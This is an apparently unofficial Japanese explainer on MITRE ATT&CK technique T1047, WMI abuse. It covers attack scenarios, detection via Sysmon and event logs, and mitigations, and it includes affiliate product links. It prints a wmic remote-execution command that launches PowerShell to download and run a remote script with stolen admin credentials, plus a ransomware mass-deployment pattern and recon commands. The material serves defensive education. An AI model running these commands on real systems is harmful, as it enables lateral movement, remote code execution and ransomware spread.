T1047 Windows Management Instrumentationとは?MITRE ATT&CK日本語解説

T1047Tactic: Execution (TA0002)|ATT&CK v16|非公式日本語解説

※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。

Windows Management Instrumentation(WMI)はWindows環境の管理に不可欠なインフラですが、攻撃者にとっても強力な武器です。MITRE ATT&CKではT1047 Windows Management Instrumentationとして分類されており、APTグループからランサムウェアまで幅広く悪用されています。本記事では、WMIを使った攻撃手法、実際の攻撃事例、検出方法と緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

ATT&CK IDT1047
TacticExecution(実行 / TA0002)
対応バージョンATT&CK v16
対応プラットフォームWindows

概要

T1047はExecution(実行 / TA0002)タクティクスに属するテクニックです。WMI(Windows Management Instrumentation)はWindowsに標準搭載された管理基盤で、システム情報の収集、プロセス管理、リモートでのコマンド実行、イベント監視などの機能を提供します。

攻撃者はWMIを使って、ローカルおよびリモートでのコマンド実行システム情報の偵察永続化メカニズムの設置(WMIイベントサブスクリプション)、横展開(Lateral Movement)を行います。WMIはOS標準機能であり、正規の管理操作と攻撃を区別しにくいため、Living-off-the-Land手法の代表格です。

WMIへのアクセスは主に3つの方法で行われます:wmic.exeコマンドラインツール(非推奨だがまだ利用可能)、PowerShellのGet-WmiObject/Get-CimInstanceコマンドレット、そしてWMIのCOMインターフェースを直接利用するスクリプトです。

攻撃シナリオ例

APT29(Cozy Bear)— WMIによるリモートコマンド実行

APT29は、初期侵入後の横展開フェーズでWMIを積極的に活用します。窃取した管理者資格情報を使い、WMIのリモート実行機能で他のマシンにペイロードを展開します:

:: WMICによるリモートプロセス実行の例(検知テスト用)
wmic /node:"192.168.1.100" /user:"DOMAIN\admin" /password:"..." process call create "cmd.exe /c powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://...')"

この手法はRDP(リモートデスクトップ)と異なりGUIの操作痕跡を残さないため、フォレンジック調査で発見されにくい特徴があります。

WMIイベントサブスクリプションによる永続化

WMIイベントサブスクリプションは、特定のイベント(ユーザーログオン、特定時刻の到来など)をトリガーにしてコードを自動実行する仕組みです。攻撃者はこれを永続化メカニズムとして利用します:

  • EventFilter: トリガー条件を定義(例: ユーザーがログオンした時)
  • EventConsumer: 実行するアクション(例: PowerShellスクリプトを実行)
  • FilterToConsumerBinding: トリガーとアクションを紐付け

この永続化手法はレジストリやスタートアップフォルダに痕跡を残さないため、従来の自動起動チェックでは発見が困難です。

ランサムウェアグループ — WMIによる大量展開

Ryuk、Contiなどのランサムウェアグループは、ドメイン管理者権限を取得した後、WMIを使ってネットワーク内の全マシンにランサムウェアを一斉展開します。wmic /node:@targets.txt process call createのようなコマンドで数百台のマシンに同時にペイロードを実行させ、被害を最大化します。

WMIによるシステム偵察

攻撃者は侵入後の情報収集にもWMIを多用します:

:: WMIによる偵察コマンドの例
wmic os get caption,version,osarchitecture    &:: OS情報
wmic process list brief                       &:: 実行中プロセス一覧
wmic service list brief                       &:: サービス一覧
wmic useraccount list brief                   &:: ユーザーアカウント一覧
wmic qfe list                                 &:: インストール済みパッチ一覧
wmic product get name,version                 &:: インストール済みソフトウェア

検出方法

プロセス監視

  • wmic.exeの実行監視(Sysmon Event ID 1): 特に/node:パラメータ(リモート実行)やprocess call create(プロセス生成)を含む実行を検出
  • WmiPrvSE.exeの子プロセス: WMIプロバイダーホストプロセス(WmiPrvSE.exe)からcmd.exe/powershell.exeが起動された場合はリモートWMI実行の指標
  • scrcons.exeの実行: WMIイベントサブスクリプションのスクリプトコンシューマーが実行された場合、永続化の可能性

Windowsイベントログ

  • Microsoft-Windows-WMI-Activity/Operational(Event ID 5857〜5861): WMIプロバイダーのロード、一時的/永続的イベントサブスクリプションの登録を記録
  • Sysmon Event ID 19/20/21: WMIイベントフィルタ/コンシューマー/バインディングの作成を検出(永続化メカニズムの設置を検出)
  • Sysmon Event ID 1: wmic.exeの起動とコマンドライン引数を記録
  • Security Event ID 4648: 明示的な資格情報を使用したリモートWMI接続を検出

ネットワーク監視

  • DCOM/RPC通信: TCP 135(RPC Endpoint Mapper)とランダム高ポートを使用するDCOM通信を監視
  • WinRM通信: TCP 5985/5986(HTTP/HTTPS)でのCIM/WMI通信を監視

緩和策(Mitigations)

ID緩和策名概要
M1026Privileged Account ManagementWMIのリモート実行を管理者アカウントに限定し、特権アカウントの管理を厳格化
M1040Behavior Prevention on EndpointEDRでWmiPrvSE.exeからの不審な子プロセス起動をブロック
M1038Execution PreventionAppLocker/WDACでwmic.exeの使用を制限
M1018User Account ManagementリモートWMIへのアクセス権を必要最小限のユーザーに制限

実務での推奨対策

  • wmic.exeの使用制限: Microsoftはwmic.exeを非推奨としている。AppLocker/WDACでwmic.exeの実行をブロックし、必要な場合はPowerShellのGet-CimInstanceに移行
  • WMI名前空間のACL設定: wmimgmt.mscでWMI名前空間のアクセス権を確認し、リモートアクセスを許可するアカウントを最小限に制限
  • Sysmon導入・設定: Event ID 19/20/21でWMIイベントサブスクリプションの作成を監視し、永続化の試みを検出
  • Windows Firewallの設定: 不要なリモートWMI(DCOM/RPC)通信をファイアウォールでブロック
  • WMIイベントサブスクリプションの定期監査: Get-WmiObject -Namespace root\subscription -Class __EventFilterで不審なイベントフィルタを定期的にチェック

関連するテクニック

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら:エンドポイント保護ソフトの導入
攻撃者がWMIを使用する場合、振る舞い検知機能を持つエンドポイント保護が有効な緩和策となります。

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

  • T1047 WMIは、Windows標準の管理基盤を悪用するLiving-off-the-Land手法であり、攻撃チェーンの複数段階で使用される
  • リモートコマンド実行、WMIイベントサブスクリプションによる永続化、ランサムウェアの大量展開が主な悪用パターン
  • Sysmon Event ID 19/20/21によるWMIサブスクリプション監視、WmiPrvSE.exeの子プロセス監視が検出の鍵
  • wmic.exeの使用制限、WMI名前空間ACLの厳格化、リモートDCOM通信の制限が有効な緩和策

参考文献

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト(https://attack.mitre.org/)をご参照ください。

コメント

タイトルとURLをコピーしました